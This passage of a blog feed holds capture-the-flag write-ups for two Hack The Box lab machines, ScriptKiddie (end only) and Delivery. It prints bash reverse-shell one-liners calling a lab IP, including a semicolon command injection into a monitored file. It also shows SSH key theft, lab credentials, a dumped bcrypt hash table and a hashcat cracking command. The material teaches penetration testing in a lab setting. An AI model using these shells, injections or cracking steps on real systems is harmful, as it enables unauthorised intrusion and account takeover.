&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_  &lt;span style=&#34;color:#ae81ff&#34;&gt;256&lt;/span&gt; 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;ED25519&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;5000/tcp open  http    Werkzeug httpd 0.16.1 &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;Python 3.8.5&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_http-title: k1d&lt;span style=&#34;color:#960050;background-color:#1e0010&#34;&gt;&amp;#39;&lt;/span&gt;&lt;span style=&#34;color:#ae81ff&#34;&gt;5&lt;/span&gt; h4ck3r t00l5
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Nmap &lt;span style=&#34;color:#66d9ef&#34;&gt;done&lt;/span&gt;: &lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; IP address &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; host up&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt; scanned in 30.26 seconds
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;NMAP  shows there is an SSH server which will be quiet useful late. For now since there are no know credentials or see an obvious vulnerability take a look at the web server on port 5000.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/scriptkiddie-h4ck3rt00l5.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;The site is a page single page of various &lt;em&gt;h4ck3r t00l5&lt;/em&gt;, NMAP, an msfvenom payload generator, and a search bar for Exploit DB. There doesn&amp;rsquo;t seem to be a whole lot more on the web server. Payloads can be generated and have an upload feature but outside of that and viewing the output from Exploit DB and NMAP there isn&amp;rsquo;t much on the site.&lt;/p&gt;
&lt;h2 id=&#34;foothold&#34;&gt;Foothold&lt;/h2&gt;
&lt;p&gt;It&amp;rsquo;s worth fuzzing by trying various special characters in the input fields for the nmap and exploit-db, and msfvenom input fields to see if there is a way to break it and achieve code execution. This doesn&amp;rsquo;t yield much and it seems there is some level of filtering in place.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/scriptkiddie-stophackingme.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;However, there is another place to provide user input. The msfvenom upload. . Playing around with the parameters shows that the windows payload expects an EXE, Android expects an APK, and  Linux would like an ELF. However it doens&amp;rsquo;t seem to work properly, returns that &amp;ldquo;Something went wrong&amp;rdquo;. Not super descriptive for trouble shooting.&lt;/p&gt;
&lt;p&gt;It turns out that  &lt;a href=&#34;https://nvd.nist.gov/vuln/detail/CVE-2020-7384&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;CVE-2020-7384&lt;/a&gt;
 is a vulnerability in msfvenom that allows for code injection using APK template files.  We find a link on the nvd.nist.gove page that links to a &lt;a href=&#34;https://packetstormsecurity.com/files/161200/Metasploit-Framework-6.0.11-Command-Injection.html&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;Metasploit module&lt;/a&gt;
.&lt;/p&gt;
&lt;p&gt;A module has also been included in msfconsole. Finding and configuring it is fairly trivial.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/scriptkiddie-msfvenomapkrcesetup.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;A payload is generated and then stored. Start a netcat listener, &lt;code&gt;nc -lnvp 4444&lt;/code&gt;, and  upload the malicious APK to the server.&lt;/p&gt;
&lt;p&gt;After a few minutes of loading, the listner gets a callback.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/scriptkiddie-callback.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;The call back is as the user &lt;code&gt;kid&lt;/code&gt; and they have a private SSH key in &lt;code&gt;/home/kid/.ssh/id_rsa&lt;/code&gt;That can be copied and pasted an attacker&amp;rsquo;s machine, permissions changed, &lt;code&gt;chmod 600 kid-id_rsa&lt;/code&gt; and then used to SSH right in and collect user.txt&lt;/p&gt;
&lt;h2 id=&#34;privilege-escalation&#34;&gt;Privilege Escalation&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;kid&lt;/code&gt; doesn&amp;rsquo;t seem to be in interesting groups nor do we have credentials to try and abuse. Checking through the code of the webapp to see if there is anything that can be used.&lt;/p&gt;
&lt;p&gt;IPs from requests that that are marked as containing special characters are entered into a &lt;code&gt;hackers&lt;/code&gt; file that also appears to be empty. Though &lt;code&gt;kid&lt;/code&gt; does have write permissions. Expanding the search beyond the &lt;code&gt;kid&lt;/code&gt;&amp;rsquo;s home directory and finds another user, &lt;code&gt;pwn&lt;/code&gt; We check out his directory and find a nicely named script called &lt;code&gt;scanlosers.sh&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/scriptkiddie-scanlosers.png&#34;
        alt=&#34;SCANLOSERS.PNG&#34;/&gt;&lt;/p&gt;
&lt;p&gt;It collects input from the &lt;code&gt;hackers&lt;/code&gt; file found earlier. One option would be to try to provide it with input that would launch a reverse shell. An attacker can stand up a netcat listener, &lt;code&gt;nc -lnvp 1234&lt;/code&gt;, and start trying to get a working payload.&lt;/p&gt;
&lt;p&gt;The following is a good starting point. &lt;code&gt;echo &amp;quot;bash -c &#39;bash -i&amp;gt;&amp;amp;/dev/tcp/10.10.14.20/1234 0&amp;gt;&amp;amp;1&#39;&amp;quot; &amp;gt; /home/kid/hackers&lt;/code&gt; and unfortunately, nothing comes back.  A space and a semi colon can be added to make sure we escape a current command. &lt;code&gt;echo &amp;quot;  ;bash -c &#39;bash -i&amp;gt;&amp;amp;/dev/tcp/10.10.14.20/1234 0&amp;gt;&amp;amp;1&#39;&amp;quot; &amp;gt; /home/kid/hackers&lt;/code&gt; The netcat listener get&amp;rsquo;s a connection!&lt;/p&gt;
&lt;p&gt;Which promptly dies. &amp;ldquo;ambicous redirect&amp;rdquo;&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/scriptkiddie-ambiguousredirect.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;It&amp;rsquo;s likely that whatever is after the reverse shell in  &lt;code&gt;scanlosers.sh&lt;/code&gt; script is doing odd things to it. A solution is to comment it out. &lt;code&gt;echo &amp;quot;  ;bash -c &#39;bash -i&amp;gt;&amp;amp;/dev/tcp/10.10.14.20/1234 0&amp;gt;&amp;amp;1&#39; # &amp;quot; &amp;gt; /home/kid/hackers&lt;/code&gt; Bingo. This time the call back is stable. &lt;code&gt;pwn&lt;/code&gt; is also kind enough to have a handy SSH key.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/scriptkiddie-pwnsshkey.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;h2 id=&#34;root&#34;&gt;Root&lt;/h2&gt;
&lt;p&gt;Once again, &lt;code&gt;pwn&lt;/code&gt; doesn&amp;rsquo;t any interesting groups nor are there credentials to try &lt;em&gt;but&lt;/em&gt; &lt;code&gt;sudo -l&lt;/code&gt; reveals they can run a command with root privileges without authentication.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/scriptkiddie-pwnsudopermissions.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;Msfconsolse can be started with root privileges. Not exactly the best sudo configuration. Launching the msfconsole we have full root privileges and nothing says we need to attack a remote target. Instead the commands can be executed directly on our current system.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/scriptkiddie-root.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;h2 id=&#34;wrap-up&#34;&gt;Wrap Up&lt;/h2&gt;
&lt;p&gt;All in all, this was a pretty easy box and probably one of the shortest writeups I have written. That said, I really enjoyed it. In part it was nice to have a break from boxes where I had to think a lot harder and I also really enjoyed the theme of exploiting the infrastructure of a couple of Script Kiddies. Thank you very much &lt;a href=&#34;https://app.hackthebox.eu/users/4935&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;0xdf&lt;/a&gt;
 all the hard work you put into making this machine.&lt;/p&gt;
&lt;p&gt;Side note: Some of you maybe wondering how &lt;code&gt;scanlosers.sh&lt;/code&gt; was running. It seems like a cronjob but if you checked cron while enumerating, you won&amp;rsquo;t find it. It&amp;rsquo;s instead using something called &lt;code&gt;incron&lt;/code&gt;which instead of being time based, is based on file system events. It runs when it detects a write to &lt;code&gt;hackers&lt;/code&gt;, &lt;code&gt;scanlosers.sh&lt;/code&gt;. It&amp;rsquo;s a pretty neat trick that I should find a use for someday.&lt;/p&gt;
</description>
    </item>
    
    <item>
      <title>HTB Delivery</title>
      <link>http://0xnightwolf.github.io/htb-writeups/delivery-writeup.md/</link>
      <pubDate>Sat, 22 May 2021 00:00:00 +0000</pubDate>
      
      <guid>http://0xnightwolf.github.io/htb-writeups/delivery-writeup.md/</guid>
      <description>&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-logo.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;In Delivery, we will leverage missconfigurations in a ticketing system and internal communications channels to gain access to where we certainly shouldn&amp;rsquo;t be able to go.  We will also see another example of where weak and reused passwords make our job easy.&lt;/p&gt;
&lt;h2 id=&#34;enumeration&#34;&gt;Enumeration&lt;/h2&gt;
&lt;p&gt;Starting off with a standard NMAP scan and shows  both a SSH server on port 22 and a web server on port 80.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Starting Nmap 7.91 &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt; https://nmap.org &lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt; at 2021-01-12 15:22 UTC
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Nmap scan report &lt;span style=&#34;color:#66d9ef&#34;&gt;for&lt;/span&gt; 10.10.10.222
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Host is up &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;0.15s latency&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;.
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Not shown: &lt;span style=&#34;color:#ae81ff&#34;&gt;998&lt;/span&gt; closed ports
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;PORT   STATE SERVICE VERSION
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;protocol 2.0&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| ssh-hostkey:
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|   &lt;span style=&#34;color:#ae81ff&#34;&gt;2048&lt;/span&gt; 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;RSA&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|   &lt;span style=&#34;color:#ae81ff&#34;&gt;256&lt;/span&gt; 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;ECDSA&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_  &lt;span style=&#34;color:#ae81ff&#34;&gt;256&lt;/span&gt; b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;ED25519&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;80/tcp open  http    nginx 1.14.2
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_http-server-header: nginx/1.14.2
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_http-title: Welcome
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Nmap &lt;span style=&#34;color:#66d9ef&#34;&gt;done&lt;/span&gt;: &lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; IP address &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; host up&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt; scanned in 15.60 seconds
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Without any credentials to try for SSH, it makes the most since to tackle the web server first.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-homepage.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;There isn&amp;rsquo;t much new here but there are links to a few other useful pages. A Helpdesk link and a contact page in that tells about a few ways to get in contact with the team.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-contactus.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;If users have a &lt;code&gt;@delivery.htb&lt;/code&gt; email, sign up for an internal Mattermost server. Lacking that, unregistered users can open a ticket on a help desk platform.so we start by checking out the ticket system. The same one linked by from help desk on the home page.&lt;/p&gt;
&lt;h3 id=&#34;os-ticket&#34;&gt;OS Ticket&lt;/h3&gt;
&lt;p&gt;This leads to another subdomain. &lt;code&gt;http://helpdesk.delivery.htb/&lt;/code&gt;, which means &lt;code&gt;/et/hosts&lt;/code&gt; will need to be edited to make it reachable.&lt;/p&gt;
&lt;p&gt;A user account is not required prior to creating a ticket. It asks for standard information, name, email address, description of the problem, and so on.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-ticketcreatepage.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;Doesn&amp;rsquo;t seem to be a whole lot here. We can pull up our ticket using the info on this page for editing and further communication and we also have an email that we could send replies too.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-ticketopeneedpage.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;From the ticket&amp;rsquo;s status page, we can see the info we submitted to open the ticket originally.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-ticketmade.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;An attempt can be made  to register an account, but it requires email verification. As HTB boxes are not connected to the internet, there is never going to be a confirmation email.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-accontconfirmationrequired.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;h3 id=&#34;foothold-mattermost-and-credential-reuse&#34;&gt;Foothold, Mattermost and Credential Reuse&lt;/h3&gt;
&lt;p&gt;The next thing to look at is the Mattermost instance.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-mattermostloginpage.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;There is a login page but no credentials so far. It&amp;rsquo;s possible to attempt to register but a  &lt;code&gt;@delivery.htb&lt;/code&gt; email account is required. A fake email could be submitted.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-mattermostsignuppage.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;But&amp;hellip; email verification is also required for Mattermost. It might seem to be a dead end. However,  a user &lt;em&gt;can&lt;/em&gt; register a &lt;code&gt;@delivery.htb&lt;/code&gt; email account. It just takes a bit of creativity.&lt;/p&gt;
&lt;p&gt;Recall the ticket created on the OS Ticket platform, it provided an email that could be send replies to the ticket. Prehapes, it can be used as a valid &lt;code&gt;@deliery.htb&lt;/code&gt; email to register for the internal Mattermost server.&lt;/p&gt;
&lt;p&gt;Sure enough, the email given by the support ticket can receive email confirmation&amp;rsquo;s from Mattermost.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-verificationlinkiniticket.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;Once the an account is verified it can be used to login to Mattermost.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-emailverified.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;There are a few more steps in the account setup, including joining the Internal channel. Time to see what juicy secrets are being kept in their channels.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-mattermostinternalteam.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;There are a few things to learn from this page. First, there are some credentials that can potentially be used to login elsewhere the OS Ticket platform and based on the conversation, they might work other places as well. &lt;code&gt;maildeliverer:Youve_G0t_Mail!&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;The above credentials can be used to access the Agent Sign in on OS Ticket. There might be other interesting info here but there doens&amp;rsquo;t seem to be much here in this case.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-osticketagentlogin.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-osticketagentpanel.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-osticketagentlogin.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;However, the Mattermost channel also mentioned that password reuse was a problem. These credentials will likely work elsewhere.  Turns out one such place is, SSH.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-maildelivererssh.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;h2 id=&#34;root-password-cracking&#34;&gt;Root: Password Cracking&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;maildelivery&lt;/code&gt; doesn&amp;rsquo;t have any interesting groups or sudo rights. It might be able to access where Mattermost credentials are stored.  That would lead to some hashes we could likely crack.&lt;/p&gt;
&lt;p&gt;First thing to try is to check the Mattermost &lt;code&gt;config.json&lt;/code&gt; stored in &lt;code&gt;/opt/mattermost/config&lt;/code&gt; There the credentials Mattermost uses to interact with a local mysql database, &lt;code&gt;mmuser:Crack_The_MM_Admin_PW&lt;/code&gt;, are found.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-mattermostsqlsettings.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;These can be used to login into the local mysql instance.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-mysqldbaccess.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;Listing the databases shows there is one for Mattermost. Among the tables it contains, is one for users.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-mattermostdatabase.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;Select the username and password fields and listing the contents to reveal the hash for the &amp;ldquo;root&amp;rdquo; user.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;MariaDB &lt;span style=&#34;color:#f92672&#34;&gt;[&lt;/span&gt;mattermost&lt;span style=&#34;color:#f92672&#34;&gt;]&lt;/span&gt;&amp;gt; &lt;span style=&#34;color:#66d9ef&#34;&gt;select&lt;/span&gt; Username, password from Users;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;+----------------------------------+--------------------------------------------------------------+
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| Username                         | password                                                     |
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;+----------------------------------+--------------------------------------------------------------+
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| surveybot                        |                                                              |
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK |
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G |
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| root                             | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO |
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq |
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| channelexport                    |                                                              |
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm |
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| a9647633                         | $2a$10$NPohGjjgCpRgA6fyFTnKhO5Y4l5XZchc7ax5mcOplVPU/qN/KjQri |
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;+----------------------------------+--------------------------------------------------------------+
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;On the internal Mattermost channel, it was mentioned that &amp;ldquo;PleasSubcribe!&amp;rdquo; was probably used a lot and though it wasn&amp;rsquo;t in rockyou.txt the admin thought it could be cracked pretty trivially with some rules.&lt;/p&gt;
&lt;p&gt;Before it can be cracked, the hash type needs to be identified.  Hash identifier can typically get you on the right track with these and this one is predicted to be bcrypt.&lt;/p&gt;
&lt;p&gt;Rules are a way to create variations of Passwords without needing a larger password file. They can be things like adding &lt;code&gt;1234&lt;/code&gt; at the end of a password or exchanging &amp;ldquo;a&amp;rdquo; for &amp;ldquo;@&amp;rdquo;. Hashcat includes a number of rules configuration files and they can be a good starting point. Next a &amp;ldquo;wordlist&amp;rdquo; with the single the single password, &amp;ldquo;PleaseSubscribe!&amp;rdquo; is created.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-PowerShell&#34; data-lang=&#34;PowerShell&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;.\hashcat64.exe -a 0 -m 3200 .\hashes_in.txt .\wordlist.txt -r .\rules\base64.rule
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-hashcatcracked.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;A result comes back pretty quickly.&lt;code&gt;root:PleaseSubscribe!21&lt;/code&gt; That can be used to login over SSH and gain full access over the machine.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/delivery-root.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;h2 id=&#34;notetxt&#34;&gt;note.txt&lt;/h2&gt;
&lt;p&gt;IppSec left a note.txt providing some more context and inspiration behind the foothold on this box. I highly recommend giving it a read.&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;root@Delivery:~# cat note.txt
I hope you enjoyed this box, the attack may seem silly but it demonstrates a pretty high risk vulnerability I&amp;#39;ve seen several times.  The inspiration for the box is here:

- https://medium.com/intigriti/how-i-hacked-hundreds-of-companies-through-their-helpdesk-b7680ddc2d4c

Keep on hacking! And please don&amp;#39;t forget to subscribe to all the security streamers out there.

- ippsec
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;In the spirit of the note, here are some cybersecurity streamers and YouTubers I would recommend checking out.&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;IppSec&lt;/a&gt;
, the creator or this box, releases a video writeups for HTB boxes are they retire. They are very well put together and I would highly recommend checking them out for HTB or using &lt;a href=&#34;https://ippsec.rocks/&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;his site&lt;/a&gt;
 to lookup specific tools or situations you might encounter.&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;https://www.youtube.com/channel/UCVeW9qkBjo3zosnqUbG7CFw&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;John Hammond&lt;/a&gt;
 posts video writeups for various CTFs and wargames. Awesome friendly guy and I totally recommend checking him out especially if you are looking to get started as a beginner.&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;LiveOverflow&lt;/a&gt;
 makes videos on various CTF challenges and also dug into several other topics in some short series including, hardware security research, browser exploitation, Pwn Adventure 3 (a game designed for hacking) and a whole lot more.&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;https://www.youtube.com/channel/UC3S8vxwRfqLBdIhgRlDRVzw&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;StackSmashing&lt;/a&gt;
 has done some really cool things in relation to hardware, reverse engineering, and hacking handheld game devices. There is also a few on reversing WannaCry and one about reversing and modifying an IoT Camera.&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;https://www.youtube.com/channel/UCCkVMojdBWS-JtH7TliWkVg&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;Gynvael&lt;/a&gt;
 streams regularly each week on various cyber security topics. One things about it is because it is a live stream, you get a chance to see raw work flow and methodology.&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;https://www.twitch.tv/gamozo&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;Gamozo Labs&lt;/a&gt;
